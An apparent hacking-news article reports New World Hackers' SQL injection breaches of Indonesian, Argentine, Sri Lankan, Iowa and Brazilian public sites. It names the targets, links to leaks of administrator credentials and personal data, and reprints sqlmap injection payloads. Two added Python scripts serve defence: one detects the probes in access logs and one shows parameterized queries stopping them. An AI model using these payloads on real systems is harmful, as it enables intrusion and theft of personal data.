Kementerian Energi dan Sumber Daya Mineral Republik Indonesia & Sistema de Gestión SUMAR Hacked by New World Hackers


Yesterday morning, January 23rd 2019, two new members of New World Hackers going by the names “Mizaru” and “Ftp” announced the hack and leak of two government agencies. More specifically, the Ministry of Energy and Mineral Resources of the Republic of Indonesia (ESDM) and a branch of the Argentinian Ministry of Health known as Sistema de Gestión (SUMAR) were the two sites compromised.

Once again, just as with their hacks earlier this week, the leak is somewhat unconventional. Instead of leaking data or information contained within the hacked databases, the hackers have chosen to publish the SQL injection vulnerabilities used to compromise the databases in the first place, essentially showing others how the hack was carried out, whether for others to replicate or for site administrators to patch.

Ministry of Energy and Mineral Resources: hxxp://tpdk.esdm.go.id
Vulnerabilities Leak: https://ghostbin.com/paste/kc6jo

Sistema de Gestión (SUMAR): hxxp://plannacer.larioja.gov.ar/
Vulnerabilities Leak:

https://twitter.com/MZR_h4x0r/status/1088037279627649024

https://twitter.com/MZR_h4x0r/status/1088112570421129216

Batticaloa Municipal Council of Sri Lanka Hacked, Site Databases Leaked Online

Shortly after New Year's 2019, hackers “Shizen” and “Ftp” announced a hack of the Batticaloa Municipal Council in Sri Lanka. The leak runs to some 760 lines; most notably, it contains the personal information of 22 website administrators, including their usernames, email addresses, phone numbers and full passwords, in principle enough for anyone to log into the back end of the website. Also included in the leaked databases is personal information on 100 Municipal Council members, including their full names, addresses, emails, ID numbers, passwords, phone numbers and usernames.

Website Affected: hxxp://batticaloa.mc.gov.lk
Raw Leak: https://ghostbin.com/paste/r5s4d


https://twitter.com/__sh1z3n/status/1080216837873459201

East Sac Community School District Hacked, Databases Leaked Online

Last night “Shizen” and “Ftp” of New World Hackers announced a hack of East Sac Community School District in Lake View, Iowa, gaining remote access to several site databases before compiling and ultimately dumping the information online. In a press release made available to the public through Ghostbin, Shizen explains that the website was compromised through several SQL injections; the target was fingerprinted as a WordPress site running PHP 5.6.23 on an Nginx web server with a MySQL back-end database.

Parameter: id (GET)

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=7 AND 1973=1973

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=7 AND (SELECT 4390 FROM(SELECT COUNT(*),CONCAT(0x7170716271,(SELECT (ELT(4390=4390,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=7 AND SLEEP(5)

Exposed within the leak are the exact vulnerabilities affecting the site and the payloads delivered to compromise it, as well as the root admin username and password. You can also find the contact information of various school employees and administrators, including full names, positions, email addresses and phone numbers, as well as the login usernames, emails and hashed passwords of various site administrators.
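For defenders, the value of the published payloads is that they are sqlmap's default probe shapes, and they land verbatim in web server access logs. The script below is an added example, not part of the leak or of this article: it decodes the query string of each request in a constructed Nginx-style access log and flags the three probe types reported for this site plus the UNION form seen later on this page. The IP addresses, timestamps and log lines are made up for the example, and the check deliberately ignores the User-Agent, which sqlmap can randomize.

```python
# Added example for this article (constructed log lines; not part of the leak):
# flag sqlmap's default probe shapes in access logs by looking at the decoded
# query string rather than the User-Agent, which sqlmap can randomize.
import re
from urllib.parse import unquote_plus, urlsplit

# One (name, pattern) per technique reported in the sqlmap output above.
TECHNIQUES = [
    ("boolean-based blind", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("error-based (FLOOR)", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("time-based blind", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\s+NULL\b", re.I)),
]

# Common/combined log format: client IP first, then the request line in quotes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def classify(query: str) -> list:
    """Names of the techniques whose signature appears in a URL-encoded query string."""
    decoded = unquote_plus(query)
    return [name for name, pat in TECHNIQUES if pat.search(decoded)]


def scan(log_text: str) -> dict:
    """Map client IP -> techniques observed, for clients with at least one hit."""
    seen = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-request line
        ip, target = m.group(1), m.group(2)
        for name in classify(urlsplit(target).query):
            seen.setdefault(ip, set()).add(name)
    # Keep the TECHNIQUES order so the output is stable.
    return {ip: [n for n, _ in TECHNIQUES if n in names] for ip, names in seen.items()}


# Constructed sample: one normal visitor and one client stepping through the
# boolean, time-based and FLOOR error-based probes printed on this page.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Dec/2018:23:41:02 -0600] "GET /?id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [30/Dec/2018:23:41:05 -0600] "GET /?id=7%20AND%201973%3D1973 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [30/Dec/2018:23:41:06 -0600] "GET /?id=7%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [30/Dec/2018:23:41:08 -0600] "GET /?id=7%20AND%20(SELECT%204390%20FROM(SELECT%20COUNT(*)%2CCONCAT(0x7170716271%2C(SELECT%20(ELT(4390%3D4390%2C1)))%2C0x716a767671%2CFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a) HTTP/1.1" 500 1203 "-" "Mozilla/5.0"
198.51.100.9 - - [30/Dec/2018:23:42:10 -0600] "GET /?id=12 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(names))
```

The signatures are narrow on purpose: the boolean probe is matched on the `AND n=n` tautology rather than on the word AND, and the error-based probe on the `FLOOR(RAND(0)*2)` duplicate-key trick, so ordinary query strings containing those words are not flagged. A single client hitting several of these in sequence, as in the sample, is the typical footprint of an automated sqlmap run.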

Website Hit: hxxp://eastsac.k12.ia.us/
Raw Leak: https://ghostbin.com/paste/hwpf2

https://twitter.com/__sh1z3n/status/1079928590517657601?s=19

Agência de Tecnologia da Informação do Piauí Hacked by Shizen & Ftp

Just before the start of the new year, December 31st 2018, hackers “Shizen” and “Ftp” of New World Hackers announced a joint hack of the Information Technology Agency of Piauí, Brazil, leaking the contents of databases tied to the Hematology and Hemotherapy Center of Piauí online. Having covered Shizen many times in the past, this appears to be the first hack carried out under the banner of New World Hackers after previously conducting hacks on behalf of Pryzraky, perhaps indicating a change of teams or allegiances.

Regardless, as proof of the hack, the hackers posted a mirror of the site's contents in a data dump on Twitter this morning, 21 databases in all. Analyzing the hack, the group appears to have gained remote access to the site's databases through several SQL injection vulnerabilities left unaddressed by the site's administrators; the target was fingerprinted as running PHP 5.3.3 on an Apache 2.2.16 web server backed by a MySQL 5.0 database. In another surprise move, Shizen even released the exact vulnerabilities affected and the payloads delivered within the leak itself, something normally redacted or kept private.

For example, here are the four SQL injection vulnerabilities implicated:

Website Hit: hxxp://hemopi.pi.gov.br/

Vulnerability 1: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=13' AND 7214=7214 AND 'aWjt'='aWjt

Vulnerability 2: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=13' AND (SELECT 8268 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(8268=8268,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lEbP'='lEbP

Vulnerability 3: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=13' AND SLEEP(5) AND 'ouoQ'='ouoQ

Vulnerability 4: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=13' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a767071,0x78547676494a654761784744686253746e706c6f6a6a57526655576a6e6863626866495874446f56,0x716a716a71)-- EKMl
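All four payloads above (and the three reported for East Sac earlier on this page) exploit the same defect: the id parameter is pasted into a single-quoted string literal inside the query, so a stray quote ends the literal and the rest of the input becomes SQL. The Python script below is an added example, not code from the leak or from New World Hackers. Against a constructed in-memory SQLite database it replays the boolean-based blind and UNION payloads in the shape sqlmap printed (the 0x716a767071 / 0x716a716a71 hex literals are the marker strings qjvpq / qjqjq), then sends the same input to a parameterized query. The table layout, rows, and the password hash are made up for the example; SLEEP() and the FLOOR(RAND(0)*2) error trick are MySQL-specific and have no SQLite equivalent, so they are not reproduced.

```python
# Added example (not from the leak or New World Hackers): replay the
# boolean-based blind and UNION payloads printed above against a constructed
# SQLite database, first through string concatenation, then parameterized.
import sqlite3

# sqlmap's hex literals 0x716a767071 / 0x716a716a71 decode to these markers.
MARK_L, MARK_R = "qjvpq", "qjqjq"


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the site's database; all rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news  (id TEXT, title TEXT, body TEXT, author TEXT);
        INSERT INTO news VALUES ('13', 'Blood drive', 'Donors wanted Friday', 'press');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'admin@example.invalid');
    """)
    return conn


def vulnerable_lookup(conn, id_param: str):
    """The defect the leaks describe: the GET value is spliced into a quoted literal."""
    sql = "SELECT id, title, body, author FROM news WHERE id='%s'" % id_param
    return conn.execute(sql).fetchall()


def safe_lookup(conn, id_param: str):
    """Parameterized form: the value never becomes part of the SQL text."""
    sql = "SELECT id, title, body, author FROM news WHERE id=?"
    return conn.execute(sql, (id_param,)).fetchall()


# Same shape as the sqlmap payloads above; the trailing 'aWjt'='aWjt re-balances
# the quote that the injected ' opened, and -- comments out the closing quote.
BOOL_TRUE = "13' AND 7214=7214 AND 'aWjt'='aWjt"
BOOL_FALSE = "13' AND 7214=7215 AND 'aWjt'='aWjt"
UNION_DUMP = ("13' UNION ALL SELECT NULL,NULL,NULL,'%s'||username||':'||password||'%s' "
              "FROM users-- EKMl" % (MARK_L, MARK_R))


def blind_oracle(lookup, conn):
    """Boolean-based blind: row counts for a true and a false condition."""
    return len(lookup(conn, BOOL_TRUE)), len(lookup(conn, BOOL_FALSE))


def union_extract(lookup, conn):
    """UNION query: pull marker-delimited values out of the 4th column."""
    found = []
    for row in lookup(conn, UNION_DUMP):
        cell = row[3] or ""
        if MARK_L in cell and MARK_R in cell:
            found.append(cell.split(MARK_L, 1)[1].split(MARK_R, 1)[0])
    return found


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, blind oracle (true, false):", blind_oracle(vulnerable_lookup, db))
    print("vulnerable, union dump:", union_extract(vulnerable_lookup, db))
    print("parameterized, blind oracle:", blind_oracle(safe_lookup, db))
    print("parameterized, union dump:", union_extract(safe_lookup, db))
```

Against the concatenated query the true and false conditions return different row counts (the oracle sqlmap's boolean-based blind mode needs) and the UNION payload returns the users table through the fourth column; against the parameterized query every payload is just an id that matches no row.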

Raw Database Leak: https://ghostbin.com/paste/6w4ok


https://twitter.com/__sh1z3n/status/1079589738355531777